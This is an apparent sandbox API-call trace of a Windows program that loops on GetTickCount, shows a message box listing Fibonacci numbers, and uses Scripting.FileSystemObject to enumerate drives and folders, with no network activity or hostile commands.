	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.285] GetCurrentThreadId () returned 0x9a8
	[0045.286] GetCurrentThreadId () returned 0x9a8
	[0045.286] ??2@YAPEAX_K@Z () returned 0x42e000
	[0045.286] GetCurrentThreadId () returned 0x9a8
	[0045.286] ??2@YAPEAX_K@Z () returned 0x42e030
	[0045.286] malloc (_Size=0x80) returned 0x42e130
	[0045.286] malloc (_Size=0x108) returned 0x3cd510
	[0045.287] GetCurrentThreadId () returned 0x9a8
	[0045.290] ??2@YAPEAX_K@Z () returned 0x42e1c0
	[0045.294] GetTickCount () returned 0x1144a98
	[0045.295] GetTickCount () returned 0x1144a98
	[0045.299] GetTickCount () returned 0x1144a98
	[0045.303] GetTickCount () returned 0x1144aa7
	[0045.307] GetTickCount () returned 0x1144aa7
	[0045.311] GetTickCount () returned 0x1144aa7
	[0045.315] GetTickCount () returned 0x1144aa7
	[0045.318] GetTickCount () returned 0x1144ab7
	[0045.324] GetTickCount () returned 0x1144ab7
	[0045.327] GetTickCount () returned 0x1144ab7
	[0045.331] GetTickCount () returned 0x1144ab7
	[0045.334] GetTickCount () returned 0x1144ab7
	[0045.423] GetTickCount () returned 0x1144b15
	[0045.425] GetTickCount () returned 0x1144b15
	[0045.428] GetTickCount () returned 0x1144b24
	[0045.431] GetTickCount () returned 0x1144b24
	[0045.433] GetTickCount () returned 0x1144b24
	[0045.436] GetTickCount () returned 0x1144b24
	[0045.438] GetTickCount () returned 0x1144b24
	[0045.440] GetTickCount () returned 0x1144b24
	[0045.443] GetTickCount () returned 0x1144b24
	[0045.446] GetTickCount () returned 0x1144b34
	[0045.448] GetTickCount () returned 0x1144b34
	[0045.450] GetTickCount () returned 0x1144b34
	[0045.453] GetTickCount () returned 0x1144b34
	[0045.455] GetTickCount () returned 0x1144b34
	[0045.457] GetTickCount () returned 0x1144b34
	[0045.460] GetTickCount () returned 0x1144b43
	[0045.463] GetTickCount () returned 0x1144b43
	[0045.465] GetTickCount () returned 0x1144b43
	[0045.467] GetTickCount () returned 0x1144b43
	[0045.469] GetTickCount () returned 0x1144b43
	[0045.471] GetTickCount () returned 0x1144b43
	[0045.473] GetTickCount () returned 0x1144b43
	[0045.476] GetTickCount () returned 0x1144b53
	[0045.478] GetTickCount () returned 0x1144b53
	[0045.481] GetTickCount () returned 0x1144b53
	[0045.483] GetTickCount () returned 0x1144b53
	[0045.485] GetTickCount () returned 0x1144b53
	[0045.487] GetTickCount () returned 0x1144b53
	[0045.489] GetTickCount () returned 0x1144b53
	[0045.492] GetTickCount () returned 0x1144b63
	[0045.494] GetTickCount () returned 0x1144b63
	[0045.496] GetTickCount () returned 0x1144b63
	[0045.498] GetTickCount () returned 0x1144b63
	[0045.500] GetTickCount () returned 0x1144b63
	[0045.502] GetTickCount () returned 0x1144b63
	[0045.504] GetTickCount () returned 0x1144b63
	[0045.507] GetTickCount () returned 0x1144b72
	[0045.509] GetTickCount () returned 0x1144b72
	[0045.511] GetTickCount () returned 0x1144b72
	[0045.514] GetTickCount () returned 0x1144b72
	[0045.516] GetTickCount () returned 0x1144b72
	[0045.518] GetTickCount () returned 0x1144b72
	[0045.520] GetTickCount () returned 0x1144b72
	[0045.527] GetTickCount () returned 0x1144b82
	[0045.529] GetTickCount () returned 0x1144b82
	[0045.531] GetTickCount () returned 0x1144b82
	[0045.533] GetTickCount () returned 0x1144b82
	[0045.535] GetTickCount () returned 0x1144b82
	[0045.537] GetTickCount () returned 0x1144b82
	[0045.539] GetTickCount () returned 0x1144b91
	[0045.541] GetTickCount () returned 0x1144b91
	[0045.544] GetTickCount () returned 0x1144b91
	[0045.546] GetTickCount () returned 0x1144b91
	[0045.548] GetTickCount () returned 0x1144b91
	[0045.550] GetTickCount () returned 0x1144b91
	[0045.552] GetTickCount () returned 0x1144b91
	[0045.554] GetTickCount () returned 0x1144ba1
	[0045.556] GetTickCount () returned 0x1144ba1
	[0045.559] GetTickCount () returned 0x1144ba1
	[0045.561] GetTickCount () returned 0x1144ba1
	[0045.563] GetTickCount () returned 0x1144ba1
	[0045.565] GetTickCount () returned 0x1144ba1
	[0045.567] GetTickCount () returned 0x1144ba1
	[0045.569] GetTickCount () returned 0x1144bb1
	[0045.572] GetTickCount () returned 0x1144bb1
	[0045.574] GetTickCount () returned 0x1144bb1
	[0045.577] GetTickCount () returned 0x1144bb1
	[0045.579] GetTickCount () returned 0x1144bb1
	[0045.581] GetTickCount () returned 0x1144bb1
	[0045.583] GetTickCount () returned 0x1144bb1
	[0045.586] GetTickCount () returned 0x1144bc0
	[0045.588] GetTickCount () returned 0x1144bc0
	[0045.591] GetTickCount () returned 0x1144bc0
	[0045.593] GetTickCount () returned 0x1144bc0
	[0045.595] GetTickCount () returned 0x1144bc0
	[0045.597] GetTickCount () returned 0x1144bc0
	[0045.599] GetTickCount () returned 0x1144bd0
	[0045.601] GetTickCount () returned 0x1144bd0
	[0045.603] GetTickCount () returned 0x1144bd0
	[0045.605] GetTickCount () returned 0x1144bd0
	[0045.607] GetTickCount () returned 0x1144bd0
	[0045.609] GetTickCount () returned 0x1144bd0
	[0045.611] GetTickCount () returned 0x1144bd0
	[0045.613] GetTickCount () returned 0x1144bd0
	[0045.616] GetTickCount () returned 0x1144bdf
	[0045.618] GetTickCount () returned 0x1144bdf
	[0045.620] GetTickCount () returned 0x1144bdf
	[0045.622] GetTickCount () returned 0x1144bdf
	[0045.624] GetTickCount () returned 0x1144bdf
	[0045.626] GetTickCount () returned 0x1144bdf
	[0045.628] GetTickCount () returned 0x1144bdf
	[0045.630] GetTickCount () returned 0x1144bdf
	[0045.699] GetTickCount () returned 0x1144c2d
	[0045.702] GetTickCount () returned 0x1144c2d
	[0045.703] GetTickCount () returned 0x1144c2d
	[0045.706] GetTickCount () returned 0x1144c2d
	[0045.708] GetTickCount () returned 0x1144c2d
	[0045.716] GetActiveWindow () returned 0x0
	[0045.718] MessageBoxIndirectW (lpmbp=0x26c850*(cbSize=0x50, hwndOwner=0x0, hInstance=0x0, lpszText=" n  1: 1; 1: 1; 2: 2; 3: 3; 5: 5; 8: 8; 13: 13; 21: 21; 34: 34; 55: 55; 89: 89; 144: 144; 233: 233; 377: 377; 610: 610; 987: 987; ", lpszCaption="", dwStyle=0x10000, lpszIcon=0x0, dwContextHelpId=0x26c840, lpfnMsgBoxCallback=0x7fef910db70, dwLanguageId=0x409)) returned 1
	[0046.231] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7feff2a0000
	[0046.232] GetProcAddress (hModule=0x7feff2a0000, lpProcName="CLSIDFromProgIDEx") returned 0x7feff2ba4c4
	[0046.232] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x26e0c0 | out: lpclsid=0x26e0c0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0046.234] SysStringLen (param_1=0x0) returned 0x0
	[0046.234] GetProcAddress (hModule=0x7feff2a0000, lpProcName="CoGetClassObject") returned 0x7feff2d2e18
	[0046.234] CoGetClassObject (in: rclsid=0x26e0c0*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e090 | out: ppv=0x26e090*=0x42e000) returned 0x0
	[0046.527] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e000, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26e098 | out: ppvObject=0x26e098*=0x0) returned 0x80004002
	[0046.528] FileSystemObject:IClassFactory:CreateInstance (in: This=0x42e000, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e080 | out: ppvObject=0x26e080*=0x42e030) returned 0x0
	[0046.528] FileSystemObject:IUnknown:Release (This=0x42e000) returned 0x0
	[0046.528] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e030, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26e058 | out: ppvObject=0x26e058*=0x0) returned 0x80004002
	[0046.528] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e030, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e068 | out: ppvObject=0x26e068*=0x42e030) returned 0x0
	[0046.528] FileSystemObject:IUnknown:AddRef (This=0x42e030) returned 0x3
	[0046.528] FileSystemObject:IUnknown:Release (This=0x42e030) returned 0x2
	[0046.528] FileSystemObject:IUnknown:Release (This=0x42e030) returned 0x1
	[0046.528] FileSystemObject:IUnknown:AddRef (This=0x42e030) returned 0x2
	[0046.528] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e030, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26e348 | out: ppvObject=0x26e348*=0x0) returned 0x80004002
	[0046.528] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x42e030, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26e460*="Drives", cNames=0x1, lcid=0x409, rgDispId=0x26e29c | out: rgDispId=0x26e29c*=10010) returned 0x0
	[0046.528] FileSystemObject:IUnknown:AddRef (This=0x42e030) returned 0x2
	[0046.528] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e030, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26e020 | out: ppvObject=0x26e020*=0x0) returned 0x80004002
	[0046.528] FileSystemObject:IDispatch:Invoke (in: This=0x42e030, dispIdMember=10010, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26dff8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42bec0, pExcepInfo=0x26e040, puArgErr=0x26e010 | out: pDispParams=0x26dff8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42bec0*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e000, varVal2=0x0), pExcepInfo=0x26e040*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26e010*=0x42e000) returned 0x0
	[0046.530] FileSystemObject:IUnknown:Release (This=0x42e030) returned 0x1
	[0046.531] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e000, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26e030 | out: ppvObject=0x26e030*=0x0) returned 0x80004002
	[0046.531] FileSystemObject:IUnknown:AddRef (This=0x42e000) returned 0x3
	[0046.531] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e000, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26e020 | out: ppvObject=0x26e020*=0x0) returned 0x80004002
	[0046.531] FileSystemObject:IDispatch:Invoke (in: This=0x42e000, dispIdMember=-4, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26dff8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42bec0, pExcepInfo=0x26e040, puArgErr=0x26e010 | out: pDispParams=0x26dff8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42bec0*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e060, varVal2=0x0), pExcepInfo=0x26e040*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26e010*=0x42e000) returned 0x0
	[0046.532] FileSystemObject:IUnknown:Release (This=0x42e000) returned 0x2
	[0046.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e038 | out: ppvObject=0x26e038*=0x0) returned 0x80004002
	[0046.533] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e060, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e2a0 | out: ppvObject=0x26e2a0*=0x42e060) returned 0x0
	[0046.534] FileSystemObject:IUnknown:Release (This=0x42e060) returned 0x1
	[0046.534] FileSystemObject:IUnknown:AddRef (This=0x42e000) returned 0x3
	[0046.534] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e060, celt=0x1, rgvar=0x26e238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e658, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.534] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x42e0a8, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26e460*="DriveType", cNames=0x1, lcid=0xeb2800000409, rgDispId=0x26e29c | out: rgDispId=0x26e29c*=10002) returned 0x0
	[0046.534] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x42e0a8, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26e460*="RootFolder", cNames=0x1, lcid=0xeb2800000409, rgDispId=0x26e29c | out: rgDispId=0x26e29c*=10003) returned 0x0
	[0046.535] GetTickCount () returned 0x1144e5f
	[0046.535] GetTickCount () returned 0x1144e5f
	[0046.537] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e680, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d8e8 | out: ppvObject=0x26d8e8*=0x0) returned 0x80004002
	[0046.538] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e680, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26db50 | out: ppvObject=0x26db50*=0x42e680) returned 0x0
	[0046.538] FileSystemObject:IUnknown:Release (This=0x42e680) returned 0x1
	[0046.538] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.538] GetCurrentThreadId () returned 0x9a8
	[0046.538] GetCurrentThreadId () returned 0x9a8
	[0046.538] ??2@YAPEAX_K@Z () returned 0x42e7a0
	[0046.539] malloc (_Size=0x80) returned 0x42e8a0
	[0046.541] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e930, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.541] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e930, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e930) returned 0x0
	[0046.542] FileSystemObject:IUnknown:Release (This=0x42e930) returned 0x1
	[0046.542] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e930, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.542] GetCurrentThreadId () returned 0x9a8
	[0046.542] GetCurrentThreadId () returned 0x9a8
	[0046.542] ??2@YAPEAX_K@Z () returned 0x42eab0
	[0046.542] malloc (_Size=0x80) returned 0x42ebb0
	[0046.545] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ec40, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.545] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ec40, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ec40) returned 0x0
	[0046.545] FileSystemObject:IUnknown:Release (This=0x42ec40) returned 0x1
	[0046.545] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ec40, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.546] FileSystemObject:IUnknown:Release (This=0x42ec40) returned 0x0
	[0046.546] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ec40, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.546] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ec40, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ec40) returned 0x0
	[0046.547] FileSystemObject:IUnknown:Release (This=0x42ec40) returned 0x1
	[0046.547] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ec40, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.548] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ec40, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecd8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.548] FileSystemObject:IUnknown:Release (This=0x42ec40) returned 0x0
	[0046.548] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e930, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.548] FileSystemObject:IUnknown:Release (This=0x42e930) returned 0x0
	[0046.549] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e930, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.549] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e930, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e930) returned 0x0
	[0046.549] FileSystemObject:IUnknown:Release (This=0x42e930) returned 0x1
	[0046.549] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e930, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.549] FileSystemObject:IUnknown:Release (This=0x42e930) returned 0x0
	[0046.549] free (_Block=0x42ebb0) 
	[0046.549] free (_Block=0x3cd730) 
	[0046.549] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0046.549] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0046.550] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.550] GetTickCount () returned 0x1144e6f
	[0046.553] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6b0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.553] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6b0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e6b0) returned 0x0
	[0046.554] FileSystemObject:IUnknown:Release (This=0x42e6b0) returned 0x1
	[0046.554] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.555] GetCurrentThreadId () returned 0x9a8
	[0046.555] GetCurrentThreadId () returned 0x9a8
	[0046.555] ??2@YAPEAX_K@Z () returned 0x42ea40
	[0046.555] malloc (_Size=0x80) returned 0x42eb40
	[0046.558] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.558] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.558] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.558] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.558] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ebd0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42ebd0) returned 0x0
	[0046.559] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x1
	[0046.559] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.560] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ebd0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.560] FileSystemObject:IUnknown:Release (This=0x42ebd0) returned 0x0
	[0046.561] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.564] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.564] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.564] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
